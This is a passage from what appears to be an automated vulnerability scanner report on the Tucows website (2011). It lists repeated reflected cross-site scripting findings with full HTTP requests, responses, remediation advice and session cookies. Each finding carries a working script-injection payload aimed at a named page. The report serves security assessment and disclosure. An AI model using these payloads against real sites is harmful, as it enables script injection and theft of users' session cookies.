GET /includes/themes/03BlueMeany/style.css6b311"-alert(1)-"4061c82776f HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:09 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32209
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca09d"-alert(1)-"a861b895462 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesca09d"-alert(1)-"a861b895462/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:40 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32362
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78125"-alert(1)-"fa4d78589f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes78125"-alert(1)-"fa4d78589f4/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:55 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32536
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8817"-alert(1)-"edfcd1015e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeanya8817"-alert(1)-"edfcd1015e9/styles.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:04 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7526e"-alert(1)-"6df19e35abd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/themes/03BlueMeany/styles.css7526e"-alert(1)-"6df19e35abd HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:12 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31902
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3691"-alert(1)-"68987ea07e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.htmlb3691"-alert(1)-"68987ea07e0 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.144. http://www.tucows.com/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d0f6"-alert(1)-"63213006432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.html?4d0f6"-alert(1)-"63213006432=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:32 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2a0f"-alert(1)-"d3b3f7c7cb3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /previewf2a0f"-alert(1)-"d3b3f7c7cb3/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 20:31:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=0a1b30a86b03c7fe7a0105c8c64ed6cc; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 0a1b30a86b03c7fe7a0105c8c64ed6cc=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 212c1"-alert(1)-"9b74dc28a7b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preview/194850212c1"-alert(1)-"9b74dc28a7b/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 20:31:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=4a96b6ea2fb1ff12ea5cbccab443adca; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 4a96b6ea2fb1ff12ea5cbccab443adca=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd8d"><script>alert(1)</script>19ee22f0cfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /preview/194850/x222cd8d"><script>alert(1)</script>19ee22f0cfb HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46b7e"-alert(1)-"8990b025cf5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preview/194850/x2246b7e"-alert(1)-"8990b025cf5 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.149. http://www.tucows.com/preview/194850/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/preview/194850/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8153d"-alert(1)-"891c6dec5da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preview/194850/x22?8153d"-alert(1)-"891c6dec5da=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3ab0"-alert(1)-"6b16cc9a4b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy.htmla3ab0"-alert(1)-"6b16cc9a4b3 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.151. http://www.tucows.com/privacy.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/privacy.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4b0"-alert(1)-"dc8c1805ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy.html?2e4b0"-alert(1)-"dc8c1805ae=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 36886
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9edf7"-alert(1)-"26f2d744f54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap.html9edf7"-alert(1)-"26f2d744f54 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:33:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.153. http://www.tucows.com/sitemap.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95630"-alert(1)-"ad45798eea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
